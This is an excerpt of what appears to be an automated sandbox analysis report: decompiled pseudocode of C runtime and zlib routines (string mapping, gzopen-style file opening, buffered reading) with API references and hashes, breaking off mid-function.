                                                0x004170ed
                                                0x00000000
                                                0x00000000
                                                0x004170ef
                                                0x00000000
                                                0x004170ef
                                                0x004170f7
                                                0x004170fb
                                                0x004170fd
                                                0x004170fd
                                                0x004170fe
                                                0x00000000

                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02D418C0), ref: 004170C5
                                                • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                • _malloc.LIBCMT ref: 0041718A
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                • _malloc.LIBCMT ref: 0041724C
                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                • __freea.LIBCMT ref: 004172A4
                                                • __freea.LIBCMT ref: 004172AD
                                                • ___ansicp.LIBCMT ref: 004172DE
                                                • ___convertcp.LIBCMT ref: 00417309
                                                • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                • _malloc.LIBCMT ref: 00417362
                                                • _memset.LIBCMT ref: 00417384
                                                • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                • ___convertcp.LIBCMT ref: 004173BA
                                                • __freea.LIBCMT ref: 004173CF
                                                • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                • String ID:
                                                • API String ID: 3809854901-0
                                                • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E004057B0(intOrPtr* __eax) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				intOrPtr* _t57;
                                                				char* _t60;
                                                				char _t62;
                                                				intOrPtr _t63;
                                                				char _t64;
                                                				intOrPtr _t65;
                                                				intOrPtr _t66;
                                                				intOrPtr _t67;
                                                				intOrPtr _t69;
                                                				intOrPtr _t70;
                                                				intOrPtr _t74;
                                                				intOrPtr _t79;
                                                				intOrPtr _t82;
                                                				intOrPtr* _t83;
                                                				void* _t86;
                                                				char* _t88;
                                                				char* _t89;
                                                				intOrPtr* _t91;
                                                				intOrPtr* _t93;
                                                				signed int _t97;
                                                				signed int _t98;
                                                				void* _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                				void* _t103;
                                                				void* _t104;
                                                
                                                				_t98 = _t97 | 0xffffffff;
                                                				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                				_t91 = __eax;
                                                				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                					_t101 = _t100 + 4;
                                                					if(_t93 == 0) {
                                                						L31:
                                                						return 0;
                                                					} else {
                                                						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                						 *_t93 = 0;
                                                						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                						 *(_t93 + 0x6c) = _t98;
                                                						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                						_t102 = _t101 + 0xc;
                                                						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                						_t87 = _t57 + 1;
                                                						do {
                                                							_t82 =  *_t57;
                                                							_t57 = _t57 + 1;
                                                						} while (_t82 != 0);
                                                						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                						_t103 = _t102 + 4;
                                                						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                						if(_t60 == 0) {
                                                							L30:
                                                							E00405160(0, _t87, _t93);
                                                							goto L31;
                                                						} else {
                                                							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                							_t88 = _t60;
                                                							goto L7;
                                                							L9:
                                                							L9:
                                                							if( *_t91 == 0x72) {
                                                								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                							}
                                                							_t63 =  *_t91;
                                                							if(_t63 == 0x77 || _t63 == 0x61) {
                                                								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                							}
                                                							_t64 =  *_t91;
                                                							if(_t64 < 0x30 || _t64 > 0x39) {
                                                								__eflags = _t64 - 0x66;
                                                								if(_t64 != 0x66) {
                                                									__eflags = _t64 - 0x68;
                                                									if(_t64 != 0x68) {
                                                										__eflags = _t64 - 0x52;
                                                										if(_t64 != 0x52) {
                                                											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                											 *_t89 = _t64;
                                                											_t87 = _t89 + 1;
                                                											__eflags = _t87;
                                                											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                										} else {
                                                											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                										}
                                                									} else {
                                                										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                									}
                                                								} else {
                                                									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                								}
                                                							} else {
                                                								_t98 = _t64 - 0x30;
                                                							}
                                                							_t91 = _t91 + 1;
                                                							if(_t64 == 0) {
                                                								goto L26;
                                                							}
                                                							_t87 = _t103 + 0x68;
                                                							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                								goto L9;
                                                							}
                                                							L26:
                                                							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                							if(_t65 == 0) {
                                                								goto L30;
                                                							} else {
                                                								if(_t65 != 0x77) {
                                                									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                									 *_t93 = _t66;
                                                									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                									_t104 = _t103 + 0x14;
                                                									__eflags = _t67;
                                                									if(_t67 != 0) {
                                                										goto L30;
                                                									} else {
                                                										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                										if(__eflags == 0) {
                                                											goto L30;
                                                										} else {
                                                											goto L34;
                                                										}
                                                									}
                                                								} else {
                                                									_push(0x38);
                                                									_push("1.2.3");
                                                									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                									_push(8);
                                                									_push(0xfffffff1);
                                                									_push(8);
                                                									_push(_t98);
                                                									_push(_t93);
                                                									_t91 = E00404CE0();
                                                									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                									_t104 = _t103 + 0x24;
                                                									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                									if(_t91 != 0 || _t79 == 0) {
                                                										goto L30;
                                                									} else {
                                                										L34:
                                                										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                										__eflags = _t69;
                                                										_push(_t104 + 0x18);
                                                										if(__eflags >= 0) {
                                                											_push(_t69);
                                                											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                										} else {
                                                											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                											_t70 = E0040CB9D();
                                                										}
                                                										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                										__eflags = _t70;
                                                										if(_t70 == 0) {
                                                											goto L30;
                                                										} else {
                                                											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                												E00405000(_t93, 0);
                                                												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                												__eflags = _t74;
                                                												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                												return _t93;
                                                											} else {
                                                												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                												return _t93;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                							goto L42;
                                                							L7:
                                                							_t62 =  *_t83;
                                                							 *_t88 = _t62;
                                                							_t83 = _t83 + 1;
                                                							_t88 = _t88 + 1;
                                                							if(_t62 != 0) {
                                                								goto L7;
                                                							} else {
                                                								 *((char*)(_t93 + 0x5c)) = 0;
                                                							}
                                                							goto L9;
                                                						}
                                                					}
                                                				}
                                                				L42:
                                                			}

































                                                0x004057b7
                                                0x004057bf
                                                0x004057c3
                                                0x004057c5
                                                0x004057cd
                                                0x004059c8
                                                0x004059ce
                                                0x004057db
                                                0x004057e3
                                                0x004057e5
                                                0x004057ea
                                                0x00405921
                                                0x0040592a
                                                0x004057f0
                                                0x004057f3
                                                0x004057f6
                                                0x004057f9
                                                0x004057fc
                                                0x004057ff
                                                0x00405801
                                                0x00405804
                                                0x00405807
                                                0x0040580a
                                                0x0040580d
                                                0x00405810
                                                0x00405813
                                                0x00405816
                                                0x00405819
                                                0x0040581c
                                                0x00405824
                                                0x00405827
                                                0x0040582b
                                                0x0040582e
                                                0x00405831
                                                0x00405834
                                                0x00405837
                                                0x00405837
                                                0x00405839
                                                0x0040583a
                                                0x00405842
                                                0x00405847
                                                0x0040584a
                                                0x0040584f
                                                0x0040591c
                                                0x0040591c
                                                0x00000000
                                                0x00405855
                                                0x00405855
                                                0x00405859
                                                0x0040585b
                                                0x00000000
                                                0x00405870
                                                0x00405872
                                                0x00405874
                                                0x00405874
                                                0x00405877
                                                0x0040587b
                                                0x00405881
                                                0x00405881
                                                0x00405885
                                                0x00405889
                                                0x00405897
                                                0x00405899
                                                0x004058a5
                                                0x004058a7
                                                0x004058b3
                                                0x004058b5
                                                0x004058c1
                                                0x004058c5
                                                0x004058c7
                                                0x004058c7
                                                0x004058c8
                                                0x004058b7
                                                0x004058b7
                                                0x004058b7
                                                0x004058a9
                                                0x004058a9
                                                0x004058a9
                                                0x0040589b
                                                0x0040589b
                                                0x0040589b
                                                0x0040588f
                                                0x00405892
                                                0x00405892
                                                0x004058cc
                                                0x004058cf
                                                0x00000000
                                                0x00000000
                                                0x004058d1
                                                0x004058d9
                                                0x00000000
                                                0x00000000
                                                0x004058db
                                                0x004058db
                                                0x004058e0
                                                0x00000000
                                                0x004058e2
                                                0x004058e4
                                                0x00405930
                                                0x0040593f
                                                0x00405942
                                                0x00405944
                                                0x00405949
                                                0x0040594c
                                                0x0040594e
                                                0x00000000
                                                0x00405950
                                                0x00405950
                                                0x00405953
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405953
                                                0x004058e6
                                                0x004058ea
                                                0x004058ec
                                                0x004058f1
                                                0x004058f2
                                                0x004058f4
                                                0x004058f6
                                                0x004058f8
                                                0x004058f9
                                                0x00405904
                                                0x00405906
                                                0x0040590b
                                                0x0040590e
                                                0x00405911
                                                0x00405916
                                                0x00000000
                                                0x00405955
                                                0x00405955
                                                0x00405955
                                                0x00405961
                                                0x00405963
                                                0x00405967
                                                0x0040596d
                                                0x0040596e
                                                0x0040597c
                                                0x0040597d
                                                0x00405970
                                                0x00405970
                                                0x00405974
                                                0x00405975
                                                0x00405975
                                                0x00405985
                                                0x00405988
                                                0x0040598a
                                                0x00000000
                                                0x0040598c
                                                0x0040598c
                                                0x00405990
                                                0x004059a5
                                                0x004059ad
                                                0x004059b6
                                                0x004059b6
                                                0x004059b9
                                                0x004059c5
                                                0x00405992
                                                0x00405992
                                                0x004059a2
                                                0x004059a2
                                                0x00405990
                                                0x0040598a
                                                0x00405916
                                                0x004058e4
                                                0x00000000
                                                0x00405860
                                                0x00405860
                                                0x00405862
                                                0x00405864
                                                0x00405865
                                                0x00405868
                                                0x00000000
                                                0x0040586a
                                                0x0040586a
                                                0x0040586d
                                                0x00000000
                                                0x00405868
                                                0x0040584f
                                                0x004057ea
                                                0x00000000

                                                APIs
                                                • _malloc.LIBCMT ref: 004057DE
                                                  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                • _malloc.LIBCMT ref: 00405842
                                                • _malloc.LIBCMT ref: 00405906
                                                • _malloc.LIBCMT ref: 00405930
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _malloc$AllocateHeap
                                                • String ID: 1.2.3
                                                • API String ID: 680241177-2310465506
                                                • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 85%
                                                			E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                				signed int _v8;
                                                				char* _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t90;
                                                				intOrPtr* _t92;
                                                				signed int _t94;
                                                				char _t97;
                                                				signed int _t105;
                                                				void* _t106;
                                                				signed int _t107;
                                                				signed int _t110;
                                                				signed int _t113;
                                                				intOrPtr* _t114;
                                                				signed int _t118;
                                                				signed int _t119;
                                                				signed int _t120;
                                                				char* _t121;
                                                				signed int _t125;
                                                				signed int _t131;
                                                				signed int _t133;
                                                				void* _t134;
                                                
                                                				_t125 = __edx;
                                                				_t121 = _a4;
                                                				_t119 = _a8;
                                                				_t131 = 0;
                                                				_v12 = _t121;
                                                				_v8 = _t119;
                                                				if(_a12 == 0 || _a16 == 0) {
                                                					L5:
                                                					return 0;
                                                				} else {
                                                					_t138 = _t121;
                                                					if(_t121 != 0) {
                                                						_t133 = _a20;
                                                						__eflags = _t133;
                                                						if(_t133 == 0) {
                                                							L9:
                                                							__eflags = _t119 - 0xffffffff;
                                                							if(_t119 != 0xffffffff) {
                                                								_t90 = E0040BA30(_t131, _t121, _t131, _t119);
                                                								_t134 = _t134 + 0xc;
                                                							}
                                                							__eflags = _t133 - _t131;
                                                							if(__eflags == 0) {
                                                								goto L3;
                                                							} else {
                                                								_t94 = _t90 | 0xffffffff;
                                                								_t125 = _t94 % _a12;
                                                								__eflags = _a16 - _t94 / _a12;
                                                								if(__eflags > 0) {
                                                									goto L3;
                                                								}
                                                								L13:
                                                								_t131 = _a12 * _a16;
                                                								__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                								_v20 = _t131;
                                                								_t120 = _t131;
                                                								if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                									_v16 = 0x1000;
                                                								} else {
                                                									_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                								}
                                                								__eflags = _t131;
                                                								if(_t131 == 0) {
                                                									L40:
                                                									return _a16;
                                                								} else {
                                                									do {
                                                										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                											L24:
                                                											__eflags = _t120 - _v16;
                                                											if(_t120 < _v16) {
                                                												_t97 = E0040FC07(_t120, _t125, _t133);
                                                												__eflags = _t97 - 0xffffffff;
                                                												if(_t97 == 0xffffffff) {
                                                													L48:
                                                													return (_t131 - _t120) / _a12;
                                                												}
                                                												__eflags = _v8;
                                                												if(_v8 == 0) {
                                                													L44:
                                                													__eflags = _a8 - 0xffffffff;
                                                													if(__eflags != 0) {
                                                														E0040BA30(_t131, _a4, 0, _a8);
                                                														_t134 = _t134 + 0xc;
                                                													}
                                                													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													_push(0);
                                                													L4:
                                                													E0040E744(_t125, _t131, _t133);
                                                													goto L5;
                                                												}
                                                												_t123 = _v12;
                                                												_v12 = _v12 + 1;
                                                												 *_v12 = _t97;
                                                												_t120 = _t120 - 1;
                                                												_t70 =  &_v8;
                                                												 *_t70 = _v8 - 1;
                                                												__eflags =  *_t70;
                                                												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                												goto L39;
                                                											}
                                                											__eflags = _v16;
                                                											if(_v16 == 0) {
                                                												_t105 = 0x7fffffff;
                                                												__eflags = _t120 - 0x7fffffff;
                                                												if(_t120 <= 0x7fffffff) {
                                                													_t105 = _t120;
                                                												}
                                                											} else {
                                                												__eflags = _t120 - 0x7fffffff;
                                                												if(_t120 <= 0x7fffffff) {
                                                													_t55 = _t120 % _v16;
                                                													__eflags = _t55;
                                                													_t125 = _t55;
                                                													_t110 = _t120;
                                                												} else {
                                                													_t125 = 0x7fffffff % _v16;
                                                													_t110 = 0x7fffffff;
                                                												}
                                                												_t105 = _t110 - _t125;
                                                											}
                                                											__eflags = _t105 - _v8;
                                                											if(_t105 > _v8) {
                                                												goto L44;
                                                											} else {
                                                												_push(_t105);
                                                												_push(_v12);
                                                												_t106 = E0040FA20(_t125, _t131, _t133);
                                                												_pop(_t123);
                                                												_push(_t106);
                                                												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                												_t134 = _t134 + 0xc;
                                                												__eflags = _t107;
                                                												if(_t107 == 0) {
                                                													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                													goto L48;
                                                												}
                                                												__eflags = _t107 - 0xffffffff;
                                                												if(_t107 == 0xffffffff) {
                                                													L47:
                                                													_t80 = _t133 + 0xc;
                                                													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                													__eflags =  *_t80;
                                                													goto L48;
                                                												}
                                                												_v12 = _v12 + _t107;
                                                												_t120 = _t120 - _t107;
                                                												_v8 = _v8 - _t107;
                                                												goto L39;
                                                											}
                                                										}
                                                										_t113 =  *(_t133 + 4);
                                                										__eflags = _t113;
                                                										if(__eflags == 0) {
                                                											goto L24;
                                                										}
                                                										if(__eflags < 0) {
                                                											goto L47;
                                                										}
                                                										_t131 = _t120;
                                                										__eflags = _t120 - _t113;
                                                										if(_t120 >= _t113) {
                                                											_t131 = _t113;
                                                										}
                                                										__eflags = _t131 - _v8;
                                                										if(_t131 > _v8) {
                                                											_t133 = 0;
                                                											__eflags = _a8 - 0xffffffff;
                                                											if(__eflags != 0) {
                                                												E0040BA30(_t131, _a4, 0, _a8);
                                                												_t134 = _t134 + 0xc;
                                                											}
                                                											_t114 = E0040BFC1(__eflags);
                                                											_push(_t133);
                                                											_push(_t133);
                                                											_push(_t133);
                                                											_push(_t133);
                                                											 *_t114 = 0x22;
                                                											_push(_t133);
                                                											goto L4;
                                                										} else {
                                                											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
                                                											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
                                                											 *_t133 =  *_t133 + _t131;
                                                											_v12 = _v12 + _t131;
                                                											_t120 = _t120 - _t131;
                                                											_t134 = _t134 + 0x10;
                                                											_v8 = _v8 - _t131;
                                                											_t131 = _v20;
                                                										}
                                                										L39:
                                                										__eflags = _t120;
                                                									} while (_t120 != 0);
                                                									goto L40;
                                                								}
                                                							}
                                                						}
                                                						_t118 = _t90 | 0xffffffff;
                                                						_t90 = _t118 / _a12;
                                                						_t125 = _t118 % _a12;
                                                						__eflags = _a16 - _t90;
                                                						if(_a16 <= _t90) {
                                                							goto L13;
                                                						}
                                                						goto L9;
                                                					}
                                                					L3:
                                                					_t92 = E0040BFC1(_t138);
                                                					_push(_t131);
                                                					_push(_t131);
                                                					_push(_t131);
                                                					_push(_t131);
                                                					 *_t92 = 0x16;
                                                					_push(_t131);
                                                					goto L4;
                                                				}
                                                			}





























                                                0x0040bcc2
                                                0x0040bcca
                                                0x0040bcce
                                                0x0040bcd3
                                                0x0040bcd5
                                                0x0040bcd8
                                                0x0040bcde
                                                0x0040bd01
                                                0x00000000
                                                0x0040bce5
                                                0x0040bce5
                                                0x0040bce7
                                                0x0040bd08
                                                0x0040bd0b
                                                0x0040bd0d
                                                0x0040bd1c
                                                0x0040bd1c
                                                0x0040bd1f
                                                0x0040bd24
                                                0x0040bd29
                                                0x0040bd29
                                                0x0040bd2c
                                                0x0040bd2e
                                                0x00000000
                                                0x0040bd30
                                                0x0040bd30
                                                0x0040bd35
                                                0x0040bd38
                                                0x0040bd3b
                                                0x00000000
                                                0x00000000
                                                0x0040bd3d
                                                0x0040bd40
                                                0x0040bd44
                                                0x0040bd4b
                                                0x0040bd4e
                                                0x0040bd50
                                                0x0040bd5a
                                                0x0040bd52
                                                0x0040bd55
                                                0x0040bd55
                                                0x0040bd61
                                                0x0040bd63
                                                0x0040be53
                                                0x00000000
                                                0x0040bd69
                                                0x0040bd69
                                                0x0040bd69
                                                0x0040bd70
                                                0x0040bdb6
                                                0x0040bdb6
                                                0x0040bdb9
                                                0x0040be24
                                                0x0040be2a
                                                0x0040be2d
                                                0x0040beb8
                                                0x00000000
                                                0x0040bebe
                                                0x0040be33
                                                0x0040be37
                                                0x0040be87
                                                0x0040be87
                                                0x0040be8b
                                                0x0040be95
                                                0x0040be9a
                                                0x0040be9a
                                                0x0040bea2
                                                0x0040beaa
                                                0x0040beab
                                                0x0040beac
                                                0x0040bead
                                                0x0040beae
                                                0x0040bcf9
                                                0x0040bcf9
                                                0x00000000
                                                0x0040bcfe
                                                0x0040be39
                                                0x0040be3c
                                                0x0040be3f
                                                0x0040be44
                                                0x0040be45
                                                0x0040be45
                                                0x0040be45
                                                0x0040be48
                                                0x00000000
                                                0x0040be48
                                                0x0040bdbb
                                                0x0040bdbf
                                                0x0040bde0
                                                0x0040bde5
                                                0x0040bde7
                                                0x0040bde9
                                                0x0040bde9
                                                0x0040bdc1
                                                0x0040bdc8
                                                0x0040bdca
                                                0x0040bdd7
                                                0x0040bdd7
                                                0x0040bdd7
                                                0x0040bdda
                                                0x0040bdcc
                                                0x0040bdce
                                                0x0040bdd1
                                                0x0040bdd1
                                                0x0040bddc
                                                0x0040bddc
                                                0x0040bdeb
                                                0x0040bdee
                                                0x00000000
                                                0x0040bdf4
                                                0x0040bdf4
                                                0x0040bdf5
                                                0x0040bdf9
                                                0x0040bdfe
                                                0x0040bdff
                                                0x0040be00
                                                0x0040be05
                                                0x0040be08
                                                0x0040be0a
                                                0x0040bec6
                                                0x00000000
                                                0x0040bec6
                                                0x0040be10
                                                0x0040be13
                                                0x0040beb4
                                                0x0040beb4
                                                0x0040beb4
                                                0x0040beb4
                                                0x00000000
                                                0x0040beb4
                                                0x0040be19
                                                0x0040be1c
                                                0x0040be1e
                                                0x00000000
                                                0x0040be1e
                                                0x0040bdee
                                                0x0040bd72
                                                0x0040bd75
                                                0x0040bd77
                                                0x00000000
                                                0x00000000
                                                0x0040bd79
                                                0x00000000
                                                0x00000000
                                                0x0040bd7f
                                                0x0040bd81
                                                0x0040bd83
                                                0x0040bd85
                                                0x0040bd85
                                                0x0040bd87
                                                0x0040bd8a
                                                0x0040be5b
                                                0x0040be5d
                                                0x0040be61
                                                0x0040be6a
                                                0x0040be6f
                                                0x0040be6f
                                                0x0040be72
                                                0x0040be77
                                                0x0040be78
                                                0x0040be79
                                                0x0040be7a
                                                0x0040be7b
                                                0x0040be81
                                                0x00000000
                                                0x0040bd90
                                                0x0040bd99
                                                0x0040bd9e
                                                0x0040bda1
                                                0x0040bda3
                                                0x0040bda6
                                                0x0040bda8
                                                0x0040bdab
                                                0x0040bdae
                                                0x0040bdae
                                                0x0040be4b
                                                0x0040be4b
                                                0x0040be4b
                                                0x00000000
                                                0x0040bd69
                                                0x0040bd63
                                                0x0040bd2e
                                                0x0040bd0f
                                                0x0040bd14
                                                0x0040bd14
                                                0x0040bd17
                                                0x0040bd1a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040bd1a
                                                0x0040bce9
                                                0x0040bce9
                                                0x0040bcee
                                                0x0040bcef
                                                0x0040bcf0
                                                0x0040bcf1
                                                0x0040bcf2
                                                0x0040bcf8
                                                0x00000000
                                                0x0040bcf8

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000006.00000002.368689660.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000006.00000002.368689660.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_ns5251Ks.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                • String ID:
                                                • API String ID: 3886058894-0
                                                • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                				signed int _t13;
                                                				intOrPtr _t28;
                                                				void* _t29;
                                                				void* _t30;
                                                
                                                				_t30 = __eflags;
                                                				_t26 = __edi;
                                                				_t25 = __edx;
                                                				_t22 = __ebx;
                                                				_push(0xc);
                                                				_push(0x4214d0);
                                                				E0040E1D8(__ebx, __edi, __esi);
                                                				_t28 = E00410735(__ebx, __edx, __edi, _t30);
                                                				_t13 =  *0x422e34; // 0xfffffffe
                                                				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                					L6:
